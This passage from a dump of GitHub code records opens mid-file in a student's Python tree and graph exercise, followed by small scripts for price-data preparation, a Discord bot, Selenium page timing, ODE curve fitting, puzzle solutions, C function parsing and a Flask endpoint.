__init__(self, data, children=[]):\n\t\tself.data = data\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\t# return self.children\n\t\tif self.children == []:\n\t\t\treturn 'Leaf ' + str(self.data)\n\t\telse:\n\t\t\treturn 'Node ' + str(self.data) + ' ' + str(self.children)\n\n\tdef find_stack(self, data):\n\t\t\"\"\" Return node object w/ this data \n\t\tIterative solution (but can be recursive)\n\n\t\tUses a Stack - LIFO\n\t\t\n\t\tDepth First Search \n\t\t\"\"\"\n\n\t\t# Start a STACK to keep track of nodes to visit.\n\t\tto_visit = [self]\n\n\t\twhile to_visit:\n\t\t\t# Pop the last item on the list\n\t\t\tcurr = to_visit.pop()\n\n\t\t\tif curr.data == data:\n\t\t\t\treturn curr\n\n\t\t\t# Else, it is not them.\n\t\t\t# add children list to end of 'to visit' list\n\t\t\tto_visit.extend(curr.children) \n\n\t\t\t# If they do not have children, they just get popped\n\t\t\t# and you go to the next one in the stack...\n\n\t\tdef find_queue(self, data):\n\t\t\t\"\"\" Return node object w/ this data\n\t\t\tSimply by changing to queue\n\n\t\t\twe can do a FIFO\n\n\t\t\tBreadth First Search!! \n\t\t\t\"\"\"\n\n\t\t\t# Goal : get a higher ranking node\n\n\t\t\tto_visit = [self] # QUEUE\n\n\t\t\twhile to_visit:\n\t\t\t\tcurr = to_visit.pop(0) # Get the highest (first in queue)\n\n\t\t\t\tif curr.data == data:\n\t\t\t\t\treturn curr\n\n\t\t\t\t# Else, add all children to the queue\n\t\t\t\tto_visit.extend(curr.children)\n\n\nclass Tree:\n\t\"\"\" Class representing a Tree\n\n\t\t** EXPLAINATION **\n\t\tYou know that a Node is itself a Tree??\n\t\tThat means, it's a little 'extra' to make a Tree class at all.\n\n\t\tSo, here we want to make sure a single node has all\n\t\tthe functionality it needs. 
That is why Node defines\n\t\ta .find() method!\n\n\t\tAnd here, we wrote a find_in_tree method that literally\n\t\tjust calls the Node.find() method cuz we want to \n\t\tkeep the sexy encapsulation.\n\n\t\"\"\"\n\n\tdef __init__(self, root):\n\t\tself.root = root\n\n\tdef __repr__(self):\n\t\t\"\"\"Reader-friendly representation.\"\"\"\n\t\treturn \"\".format(root=self.root)\n\n\tdef find_in_tree(self, data):\n\t\t\"\"\"Return node object with this data.\n\n\t\tStart at root.\n\t\tUse the method from root to find the data\n\t\tReturn None if not found.\n\n\t\t\"\"\"\n\t\treturn self.root.find(data)\n\n\tdef list_nodes_recursive(self, node):\n\t\tprint(node.data)\n\t\tfor child in node.children:\n\t\t\tlist_nodes_recursive(child)\n\n\nclass BinaryNode:\n\t\"\"\" A Binary Search node for trees or graphs\n\n\t\t# Create root node:\n\t\t>>> bn = BinaryNode(0)\n\t\t>>> print(bn.data, bn.right, bn.left)\n\t\t0 None None\n\n\t\t# Add a new data - creates a new node & decides if it should go right or left:\n\t\t>>> bl = BinaryNode(-1)\n\t\t>>> bn.insert(-1)\n\t\t>>> bn.PrintTree()\n\t\t0\n\n\t\"\"\"\n\tdef __init__(self, data, left=None, right=None):\n\t\t# Doesnt take left and right because we must leave that to the \n\t\t# 'insert' method - that takes care of the ordering of the \n\t\t# new nodes when adding them to the tree.\n\n\t\tself.left = left\n\t\tself.right = right\n\t\tself.data = data\n\n\tdef __repr__(self):\n\t\t\"\"\"Debugging-friendly representation.\"\"\"\n\n\t\treturn \"\".format(data=self.data)\n\n\n\tdef insert(self, data):\n\t\t# Suppose the parent is 'self ' - the root\n\t\t# We want to add one child - new node with data\n\t\t# * Recursively * - with each recursive step, update the self.\n\t\t# Compare the value ' data ' of a new node with the \n\t\t\t# parent node ' self.data ' \n\t\t\t# and decides where to add it to the tree\n\n\t\tprint('self.data', self.data)\n\n\t\tif self.data != None: \n\n\t\t\t# Try the left side\t\t\n\t\t\tif data < self.data:\n\n\t\t\t\t# If left branch is empty, add new node to left\n\t\t\t\tif self.left == None:\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\t\tself.left = BinaryNode(data)\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\telse:\n\t\t\t\t\tself.left.insert(data) # Recursive call\n\n\t\t\telif data > self.data:\n\t\t\t\tif self.right == None:\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\t\tself.right = BinaryNode(data)\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\telse:\n\t\t\t\t\tprint('recursive, both branches are full', self.left, self.right)\n\t\t\t\t\tself.right.insert(data)\n\t\telse:\n\t\t\t# If self.data == None, or self.data == data, set self.data to new data\n\t\t\t# We are creating the head with the root?\n\n\n\n\t\t\t# Why: when we initialize the list, we set self but not self.data\n\t\t\t# SO it has an 'empty head'?\n\t\t\tself.data = data\n\n\n\n\tdef find(self, sought):\n\t\t\"\"\" Start at the node you're at ( where\n\t\t'self' is treated like a root, every time)\n\n\t\tUse a while loop \n\n\t\tGo through, looking left and right. \n\n\t\tUpdate curr in the 'right direction'\n\n\t\tReturn node with this data. 
\n\t\tStart at root and return None if not found\n\t\t\"\"\"\n\t\t# Start at the root\n\t\tcurr = self\n\n\t\twhile curr:\n\n\t\t\tprint('checking curr.data', curr.data)\n\n\t\t\tif curr.data == sought:\n\t\t\t\treturn curr\n\n\t\t\telif sought < curr.data:\n\t\t\t\tcurr = curr.left\n\n\t\t\telif sought > curr.data:\n\t\t\t\tcurr = curr.right\n\n\t\treturn \"None\"\n\n\n\n\n\tdef PrintTree(self):\n\t\tif self.left:\n\t\t\tself.left.PrintTree()\n\t\t\tprint(self.data)\n\t\tif self.right:\n\t\t\tself.right.PrintTree()\n\n\t# if __name__ == \"__main__\":\n\n\t# apple = BinaryNode(\"apple\")\n\t# ghost = BinaryNode(\"ghost\")\n\t# fence = BinaryNode(\"fence\", apple, ghost)\n\t# just = BinaryNode('just')\n\t# jackal = BinaryNode(\"jackal\", fence, just)\n\t# zebra = BinaryNode(\"zebra\")\n\t# pencil = BinaryNode(\"pencil\", None, zebra)\n\t# mystic = BinaryNode(\"mystic\")\n\t# pluto = BinaryNode(\"nerd\", mystic, pencil)\n\t# money = BinaryNode(\"money\", jackal, pluto)\n\n\t# print(money.find(\"nerd\"))\n\n\t# root = BinaryNode(12)\n\t# print(root)\n\n\t# root.insert(3)\n\t# root.insert(2)\n\t# root.insert(10)\n\t# root.insert(11)\n\n\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\nclass TreeTraversals:\n\t\"\"\"\n\tTraversals:\n\t- In order traversal\n\t\t\tVisit the left branch, then current, then right\n\t- Pre-order traversal\n\t\t\tVisits the current node before its child nodes\n\t- Post-order traversal\n\t\t\tVisits the current node after its child nodes\n\t\"\"\"\n\tdef in_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tin_order_traversal(node.left)\n\t\t\tvisit(node)\n\t\t\tin_order_traversal(node.right)\n\n\tdef pre_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tvisit(node)\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpre_order_traversal(node.right)\n\n\tdef post_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes after its \n\t\t\tchild nodes\n\n\t\t\tThe root will always be the last node visited.\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\t\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpost_order_traversal(node.right)\n\t\t\tvisit(node)\n\n\n# if __name__ == \"__main__\":\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\t# pass\n\n\n\nclass GraphNode:\n\n\tdef __init__(self, name, children=None):\n\t\tself.name = name\n\t\tself.children = children\n\n\tdef 
__repr__(self):\n\t\treturn f'{self.name}- c:{self.children}'\n\n\n\nclass Graph:\n\t\"\"\" Graph class must be used b/c you might not necessarily \n\t\treach all the nodes from a single GraphNode\n\t\"\"\"\n\n\tdef __init__(self, nodes=[]):\n\t\tself.nodes = nodes\n\n\tdef __repr__(self):\n\t\treturn f'ndz:{self.nodes}'\n\n\n\n\n\nif __name__ == \"__main__\":\n\tgn = GraphNode('gn')\n\tprint(gn)\n\n\tg = Graph()\n\tprint(g)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"liv-yaa/Py_Code_Challenges","sub_path":"CTCI_2020/trees-graphs-ch4.py","file_name":"trees-graphs-ch4.py","file_ext":"py","file_size_in_byte":9198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
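The find_stack/find_queue pair in the trees-and-graphs record above is the whole DFS-versus-BFS story: pop() from the end of the to-visit list gives depth-first, pop(0) from the front gives breadth-first. A compact demonstration of the two visit orders on plain tuples, independent of the Node class in the record:

def traverse(root, bfs=False):
    """Return visit order; a node is (data, [children...])."""
    order, to_visit = [], [root]
    while to_visit:
        data, children = to_visit.pop(0) if bfs else to_visit.pop()
        order.append(data)
        to_visit.extend(children)
    return order

#        a
#      b   c
#     d
tree = ("a", [("b", [("d", [])]), ("c", [])])
print(traverse(tree))            # DFS: ['a', 'c', 'b', 'd']
print(traverse(tree, bfs=True))  # BFS: ['a', 'b', 'c', 'd']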
+{"seq_id":"26620838051","text":"import pandas as pd\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sqlalchemy import create_engine\n\nengine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True)\n\ndef data_from_csv():\n wti = pd.read_csv('data/WTI_20050630_20200417.csv')\n wti_after_2015 = wti[wti['date'] > '2015-01-11']\n #print(wti_after_2015.head())\n #print(wti_after_2015.describe())\n\n # KAU\n kau18 = pd.read_csv('data/KAU18.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau18_price = kau18[['date', 'price']]\n kau18_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau18_price.count()['date'])]\n kau18_price['day'] = day_count\n #print(kau18_price.describe())\n #print(kau18_price.tail())\n\n\n kau19 = pd.read_csv('data/KAU19.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau19_price = kau19[['date', 'price']]\n kau19_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau19_price.count()['date'])]\n kau19_price['day'] = day_count\n #print(kau19_price.describe())\n #print(kau19_price.tail())\n\n kau1819 = kau18_price.append(kau19_price, ignore_index=True)\n #print(kau1819)\n\n return (wti_after_2015, kau1819)\n\n\ndef data_from_xls():\n #ELECTRICITY\n elec = pd.read_excel('data/electricity_20140101_20201025.xlsx',\n names=['date', '1', '2', '3', '4', '5', '6', '7', '8'\n , '9', '10', '11', '12', '13', '14', '15', '16'\n , '17', '18', '19', '20', '21', '22', '23', '24'])\n elec_after_2015 = elec[elec['date']>'2015-01-11']\n elec_day = elec_after_2015.sum(axis=1)\n elec_after_2015['elec'] = elec_day\n elec_after_2015.drop(['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24' ], axis='columns', inplace=True)\n # print(elec_after_2015.head())\n\n return (elec_after_2015)\n\ndef scale(df):\n print('')\n\ndef struct_data(wti, elec, kau):\n #유가는 금융시장에서 매겨지기 때문에 시장이 쉬는 날에는 데이터가 없다.\n #전력은 매일 있다.\n #그래서 유가 데이터가 없는 날의 전력 데이터는 없애야 한다.\n df = pd.DataFrame()\n\n for index, row in kau.iterrows() :\n if not wti[wti['date']==row['date']].empty :\n #print(wti[wti['date']==row['date']]['WTI($/bbl)'].values[0])\n new_row = { 'date' : row['date'], 'day' : row['day'], 'price' : row['price'],'WTI($/bbl)' : wti[wti['date']==row['date']]['WTI($/bbl)'].values[0] }\n df = df.append(new_row, ignore_index=True)\n df.insert(4,'elec', 0)\n for index, row in df.iterrows() :\n if not elec[elec['date']==row['date']].empty :\n #print(elec[elec['date']==row['date']]['elec'].values[0])\n #new_row = {'elec' : elec[elec['date']==row['date']]['elec'].values[0]}\n #df.loc[index]['elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n df.loc[index,'elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n return df\n #print(df.describe())\n #print(df.info())\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_model():\n model = keras.Sequential()\n model.add(Dense(16, input_dim = 3, activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n\n\n\n\nif __name__ == \"__main__\":\n wti, kau = 
data_from_csv()\n elec = data_from_xls()\n data = struct_data(wti, elec, kau)\n","repo_name":"2020-SKKU-S-HERO/mobius_adaptation","sub_path":"database/price_pred_model.py","file_name":"price_pred_model.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18252264290","text":"import discord\nimport json\nfrom load_config import load_config\n\nclass Utilies():\n def __init__(self, bot):\n self.bot = bot\n \n async def id_check(self, interaction:discord.Interaction):\n data = load_config()\n if str(interaction.user.id) not in data.owner_ids:\n return False\n else:\n return True\n \n async def save_ids(self, msg_id, chnl_id):\n with open(\"assets/config.json\", \"r\") as f:\n data = json.load(f)\n\n data[\"categories\"][\"channel_id\"] = str(chnl_id)\n data[\"categories\"][\"message_id\"] = str(msg_id)\n\n with open(\"assets/config.json\", \"w\") as f:\n json.dump(data, f, indent=4)\n \n async def user_to_id(self, chnl):\n with open('assets/tickets.json', 'r') as f:\n data = json.load(f)\n \n for value in data.values():\n if value.get('channel_id') == chnl:\n user = value.get('author')\n return user\n\n return None\n","repo_name":"FlickNoJutsu/pyticketbot","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15191062955","text":"from selenium import webdriver\r\n# This is a relatively simple response time tester that uses Selenium to retrieve both front and back end response times\r\n# Chrome web driver interface\r\n\r\nPATH = r\"Your chromedriver.exe location\"\r\nhyperlink = \"Whatever site you want to test the response times of\"\r\ndriver = webdriver.Chrome(PATH)\r\ndriver.get(hyperlink)\r\n\r\n# Use Navigation Timing API to calculate the timings that matter the most\r\n\r\nnavigationStart = driver.execute_script(\"return window.performance.timing.navigationStart\")\r\nresponseStart = driver.execute_script(\"return window.performance.timing.responseStart\")\r\ndomComplete = driver.execute_script(\"return window.performance.timing.domComplete\")\r\n\r\n# Calculate the performance\r\nbackendPerformance_calc = responseStart - navigationStart\r\nfrontendPerformance_calc = domComplete - responseStart\r\n\r\nprint(\"Back End: %s\" % backendPerformance_calc + \"ms\")\r\nprint(\"Front End: %s\" % frontendPerformance_calc + \"ms\")\r\n\r\ndriver.quit()","repo_name":"tdotmich/Automation","sub_path":"NavigationTestGit.py","file_name":"NavigationTestGit.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"7262957831","text":"# %% [markdown]\n#\n# This example shows how to use `CompositeExpr` to create a custom numerical expression which can\n# be used in slimfit fitting.\n#\n# In this particular example we fit data to a dampened harmonic oscillator, where the time-evolution\n# of the system is solved by `scipy.integrate.solve_ivp`.\n\nfrom __future__ import annotations\n\nimport numpy as np\nimport proplot as pplt\nfrom scipy.integrate import solve_ivp\nfrom sympy import Symbol, Expr, symbols\n\nfrom slimfit import Model, Parameters\nfrom slimfit.fit import Fit\nfrom slimfit.numerical import NumExpr, to_numerical\nfrom slimfit.base import CompositeExpr\n\n\n# %%\n\n# %% [markdown]\n#\n# Generate the GT data to fit the damped harmonic oscillator to, and add some noise.\n\n\ndef ode(x, y):\n return np.sin(2 * np.pi * 0.2 * x) * np.exp(-0.1 * x)\n\n\nnum = 100\nt_eval = np.linspace(0.0, 25, num=num, endpoint=True)\nsol = solve_ivp(ode, (0.0, 25), np.array([-1]), t_eval=t_eval)\n\nydata = sol.y + np.random.normal(0, 0.05, size=num)\ndata = {\"y\": ydata, \"t\": t_eval}\n\n# %%\n\n# %% [markdown]\n#\n# `CompositeExpr` can be subclassed to create a custom numerical expression. The subclass must\n# implement the `__call__` method, which returns a (dictionary of) the numerical values of the\n# expression. In this example, we use `solve_ivp` to solve the ODE, and return the solution at the\n# specified time points.\n#\n# Because the `__init__` method takes an additional `domain` argument, the `to_numerical` method\n# must also be implemented correctly.\n\n\nclass IVPNumExpr(CompositeExpr):\n def __init__(\n self,\n t: Symbol | NumExpr | Expr,\n freq: Symbol | NumExpr | Expr,\n damping: Symbol | NumExpr | Expr,\n y0: Symbol | NumExpr | Expr,\n domain: tuple[float, float],\n ):\n expr = {\"t\": t, \"freq\": freq, \"damping\": damping, \"y0\": y0}\n self.domain = domain\n super().__init__(expr)\n\n def __call__(self, *args, **kwargs) -> np.ndarray:\n result = super().__call__(**kwargs)\n\n sol = solve_ivp(\n self.grad_func,\n self.domain,\n np.array([result[\"y0\"]]),\n t_eval=result[\"t\"],\n args=(result[\"freq\"], result[\"damping\"]),\n )\n\n return sol.y\n\n def to_numerical(self):\n num_expr = {k: to_numerical(expr) for k, expr in self.items()}\n instance = IVPNumExpr(**num_expr, domain=self.domain)\n\n return instance\n\n @staticmethod\n def grad_func(x, y, freq, damping):\n return np.sin(2 * np.pi * freq * x) * np.exp(-damping * x)\n\n\n# %%\n\n# %% [markdown]\n#\n# The resulting class can now be used in slimfit fitting, taking any symbol or expr as arguments for\n# the args `t, f, d, y0`, or it can be embedded in a larger model.\n\nt, f, d, y0, y = symbols(\"t f d y0 y\")\nivp = IVPNumExpr(t, f, d, y0, domain=(0.0, 25.0))\n\nmodel = Model({y: ivp})\n\n# Fix frequency at GT value to ensure fit converges\nguess = {\"f\": 0.2, \"d\": 0.5, \"y0\": -1.0}\nparameters = Parameters.from_symbols(ivp.symbols, guess).replace(\"f\", fixed=True)\n\nfit = Fit(model, parameters, data)\nresult = fit.execute()\n\nprint(result.parameters)\n\n# %%\n\nfig, ax = pplt.subplots()\nax.scatter(t_eval, ydata.flatten())\nax.plot(t_eval, ivp(t=t_eval, **parameters.guess).T, color=\"r\")\nax.plot(t_eval, ivp(t=t_eval, **result.parameters).T, 
color=\"k\")\npplt.show()\n","repo_name":"Jhsmit/slimfit","sub_path":"docs/examples/custom_numexpr_ivp.py","file_name":"custom_numexpr_ivp.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"25798884442","text":"'''\n1\n5 3\n0 0 1 1 1\n1 1 1 1 0\n0 0 1 0 0\n0 1 1 1 1\n1 1 1 0 1\n'''\ndef puzzle_count(matrix, target_num) :\n total_sum_list = []\n for row in matrix:\n total_sum = 0\n for i in range(n):\n if row[i] == 1:\n total_sum += 1\n else:\n total_sum_list.append(total_sum)\n total_sum = 0\n\n total_sum_list.append(total_sum)\n return total_sum_list.count(target_num)\n\nt = int(input())\nfor case in range(1,t+1):\n n,k = map(int, input().split())\n matrix = [list(map(int, input().split())) for _ in range(n)]\n result = puzzle_count(matrix,k) + puzzle_count(list(zip(*matrix[::-1])),k)\n\n print(f'#{case}', result)","repo_name":"00purplecandy00/Algorithm-Test-03","sub_path":"2200072/어디에단어가들어갈수있을까.py","file_name":"어디에단어가들어갈수있을까.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"}
+{"seq_id":"19725076852","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-15 09:04:18\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:49\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport re\n\nrgl_exp1 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n ((\\s*)?(const)?(\\s*)? # 参数前是否有const\n ((void)|(char)|(short)|(int)|(float)|(long)|(double))? # 参数类型\n (\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?# 最后的*表示有多个参数\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n '''\n\nrgl_exp12 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n (?P(.+)?)\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n ((\\s*)(\\{)(\\n)?)\n '''\ncompileStrA = r'((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)(.+)?((\\s*)(\\))(\\n)?)((\\s*)(\\{)(\\n)?)'\ncompileStrB = r\"((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)((\\s*)?(const)?(\\s*)?((void)|(char)|(short)|(int)|(float)|(long)|(double))?(\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?((\\s*)(\\))(\\n)?)\"\ndef get1stSymPos( s, fromPos=0):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n listPos = [] # 位置,符号\n for b in g_DictSymbols: \n pos = s.find(b, fromPos)\n listPos.append((pos, b)) # 插入位置以及结束符号\n minIndex = -1 # 最小位置在listPos中的索引\n index = 0 # 索引\n while index < len(listPos):\n pos = listPos[index][0] # 位置\n if minIndex < 0 and pos >= 0: # 第一个非负位置\n minIndex = index\n if 0 <= pos < listPos[minIndex][0]: # 后面出现的更靠前的位置\n minIndex = index\n index = index + 1\n if minIndex == -1: # 没找到\n return (-1, None)\n else:\n return (listPos[minIndex])\n\ndef rmCommentsInCFile(s):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n\n if not isinstance(s, str):\n raise TypeError(s)\n fromPos = 0\n while (fromPos < len(s)):\n result = get1stSymPos(s, fromPos)\n\n if result[0] == -1: # 没有符号了\n return s\n else:\n endPos = s.find(g_DictSymbols[result[1]], result[0] + len(result[1]))\n if result[1] == '//': # 单行注释\n if endPos == -1: # 没有换行符也可以\n endPos = len(s)\n s = s.replace(s[result[0]:endPos], ' ', 1)\n fromPos = result[0]\n elif result[1] == '/*': # 区块注释\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"块状注释未闭合\")\n s = s.replace(s[result[0]:endPos + 2], ' ', 1)\n fromPos = result[0]\n else: # 字符串\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"符号未闭合\")\n fromPos = endPos + len(g_DictSymbols[result[1]])\n return s\nif __name__ == \"__main__\":\n code = \"\"\"\nvoid FuncName(int param1,char param2, int *param3, double *parma4){\n printf(\"hello world!\\n\");\n}\n \"\"\"\n filePath =r\"C:\\Users\\User\\Documents\\GitHub\\EveIDE_Plus\\source\\t_workspace\\t_exCpro\\main.c\"\n with open(filePath,'r')as r:\n code0 = r.read()\n code0 = rmCommentsInCFile(code0)\n\n pat1 = re.compile(compileStrA, re.X)\n ret = pat1.findall(code0)\n if ret:\n for ea in ret:\n print(ea[11])\n #print(code)\n '''cl = code.split(\";\")\n\n for e in cl:\n print(e)\n ret = pat1.search(e)\n if None == ret:\n pass\n #print('不包含C函数定义!')\n else:\n #for eachIndex in range(len(ret.group())):\n print(\"定义\"+str(ret))\n 
#print(ret.group())'''\n\n","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/t_file.py","file_name":"t_file.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"zh","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"}
+{"seq_id":"7227331574","text":"from collections import defaultdict, deque, namedtuple\nfrom pathlib import Path\nfrom statistics import median\nfrom typing import Iterator\n\nfrom utils import get_neighbors_n_dimensional, read_trimmed\n\n\nclass DictLike:\n def __getitem__(self, item):\n return getattr(self, item)\n\n def __setitem__(self, key, value):\n setattr(self, key, value)\n\n\nclass Point(DictLike):\n def __init__(self, x, y):\n self.x, self.y = x, y\n\n def __hash__(self):\n return hash((self.x, self.y))\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __repr__(self) -> str:\n return f\"({self.x}, {self.y})\"\n\n def fold(self, axis, line):\n if self[axis] > line:\n self[axis] = 2 * line - self[axis]\n return self\n\n\ndef q1(dots, folds):\n axis, line = folds[0]\n for dot in dots.copy():\n if axis == \"x\":\n if dot.x > line:\n dots.remove(dot)\n dots.add(Point(2 * line - dot.x, dot.y))\n return len(dots)\n\n\ndef print_dots(dots):\n x_max = max(dot.x for dot in dots)\n y_max = max(dot.y for dot in dots)\n grid = [[\" \" for _ in range(x_max + 1)] for _ in range(y_max + 1)]\n for dot in dots:\n grid[dot.y][dot.x] = \"*\"\n for row in grid:\n print(\"\".join(row))\n\n\ndef q2(dots, folds):\n for axis, line in folds:\n # If edited in place, duplicates aren't removed *shrug*\n dots = {d.fold(axis, line) for d in dots}\n print_dots(dots)\n return len(dots)\n\n\ndef parse_dots(values):\n for v in values:\n dot = v.split(\",\")\n if len(dot) == 2:\n yield Point(int(dot[0]), int(dot[1]))\n\n\ndef parse_folds(values):\n for v in values:\n if len(v.split(\" \")) == 3:\n fold = v.split(\" \")[2]\n yield fold.split(\"=\")[0], int(fold.split(\"=\")[1])\n\n\ndef main():\n filename = \"./13.txt\"\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q1(dots, folds))\n\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q2(dots, folds))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blomejd/advent_of_code_2021","sub_path":"advent_2021/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"2884716529","text":"# coding:utf-8\n# @Time : 2019-09-11 11:02\n# @Author: Xiawang\n# Description:\nfrom flask_restful import Resource, reqparse\n\nfrom backend.common.extensions import convert_json\nfrom backend.common.new_models import User, TestSheet\nfrom backend.common.response_structure import ResponseStructure\nfrom backend.common.state import Results, ResponseCode\n\n\nclass MyTestSheets(Resource):\n\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('TOKEN', type=str, location='headers')\n args = parser.parse_args()\n user = User.verify_auth_token(args['TOKEN'])\n if not user:\n return Results().get(ResponseCode.FAIL_LOGIN_AUTH)\n results = TestSheet.get_or_none(TestSheet.qa_id == user.id, TestSheet.status=='待部署')\n if results is None:\n return Results().get(ResponseCode.SUCCESS)\n result_data = Results().set_data()\n results = TestSheet.select().where(TestSheet.qa_id == user.id, TestSheet.status == '待部署').order_by(\n TestSheet.create_time.desc())\n\n for result in results:\n testsheet_data = convert_json(TestSheet, result.id)\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['qa_id'],\n user='qa_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['backend_id'],\n user='backend_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['front_id'], user='front_name')\n result_data.append(testsheet_data)\n\n return Results().get(ResponseCode.SUCCESS, data=result_data)\n","repo_name":"Ariaxie-1985/aria","sub_path":"backend/resources/spring/my_testsheets.py","file_name":"my_testsheets.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
